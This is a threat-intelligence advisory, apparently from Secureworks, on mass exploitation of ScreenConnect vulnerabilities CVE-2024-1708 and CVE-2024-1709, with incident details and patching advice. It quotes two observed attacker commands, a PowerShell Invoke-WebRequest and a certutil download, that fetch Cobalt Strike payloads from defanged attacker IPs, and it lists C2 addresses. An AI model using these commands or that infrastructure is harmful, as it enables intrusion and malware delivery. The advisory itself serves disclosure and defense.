Executive summary

• A critical remote code execution vulnerability impacting ConnectWise ScreenConnect self-hosted servers is in widespread exploitation.
• Publicly available vulnerability details and exploit code have accelerated exploitation of internet-facing ScreenConnect servers.
• Organizations should patch vulnerable servers and check for evidence of exploitation.

Details

On February 19, 2024, ConnectWise released a security bulletin detailing the following two vulnerabilities in the self-hosted ScreenConnect server. Both vulnerabilities were reported to ConnectWise on February 13 through a vulnerability disclosure program and were not observed in active exploitation until February 20.

• CVE-2024-1708 - a path traversal vulnerability with a CVSSv3 score of 8.4 (high)
• CVE-2024-1709 - a remote code execution vulnerability with a CVSSv3 score of 10.0 (critical)

On February 21, the Shadowserver Foundation identified over 8,200 publicly accessible ScreenConnect servers on the internet. The Shodan search engine corroborated this number. Both services indicated that the majority of ScreenConnect servers were unpatched versions located in the United States, Canada, and the United Kingdom.

At approximately 0630 UTC on February 21, researchers uploaded a proof-of-concept exploit to GitHub. At approximately 1330 UTC on February 21, a module to exploit CVE-2024-1709 was made available in the Metasploit framework. Details about the vulnerability and additional exploit code are widely available, making this flaw easily exploitable by threat actors of all skill levels.

Secureworks(R) Counter Threat Unit(TM) (CTU) researchers established that only a small number of Secureworks customers had vulnerable servers in their environments. CTU(TM) analysis revealed that many of these servers had been scanned for the vulnerability by multiple hosts, and several had evidence of an intrusion. In one incident beginning around 1630 UTC on February 21, a threat actor exploited a vulnerable ScreenConnect server to execute a Cobalt Strike Beacon payload. As of this publication, this is the earliest post-exploitation activity observed by CTU researchers against Secureworks customers. The payload was downloaded via PowerShell and the Invoke-WebRequest cmdlet:

powershell iwr http: //51 . 195 . 192 . 120:804/download/09D.log -outfile C:\Users\Public\09D.log

The downloaded file is a Cobalt Strike Beacon DLL that uses a hybrid HTTP DNS configuration to communicate to a command and control (C2) server at dns . artstrailreviews . com via DNS traffic. The same threat actor was observed running the nltest command to understand the local network environment.

In a second incident observed by CTU researchers, a threat actor used a compromised ScreenConnect server to download a legitimate, signed SentinelUI.exe file, a DLL named SentinelAgentCore.dll, and an encrypted file named Logs.txt that contained an encoded payload (see Figure 1).

When executed, SentinelUI.exe loads SentinelAgentCore.dll, which opens and decodes Logs.txt. The malware is a Cobalt Strike Beacon sample that uses a malleable profile intended to impersonate Microsoft Windows Update network traffic. It communicates with 185 . 232 . 92 . 32 via HTTPS on TCP port 8443 using a self-signed, expired certificate that mimics one used by bing.com.

Huntress also observed a threat actor distributing Cobalt Strike Beacon after exploitation by executing the following command:

certutil -urlcache -f http: //23 . 26 . 137 . 225:8084/msappdata.msi c:\\mpyutd.msi

Sophos detailed multiple distinct attacks that distributed LockBit ransomware, AsyncRAT, and the SimpleHelp remote access client. The LockBit samples were built using leaked copies of the ransomware and are not thought to be distributed by the GOLD MYSTIC threat group or its affiliates, whose activities were disrupted by law enforcement on February 19.

CTU researchers recommend that organizations immediately upgrade vulnerable ScreenConnect servers as appropriate and forensically examine them for signs of exploitation activity.

The CTU research team has developed the countermeasures in Table 1 to detect activity associated with this threat.

Table 1. Secureworks countermeasures covering this threat.

To mitigate exposure to this malware, CTU researchers recommend that customers use available controls to review and restrict access using the indicators listed in Table 2. Note that IP addresses can be reallocated. The domain and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

Table 2. Indicators for this threat.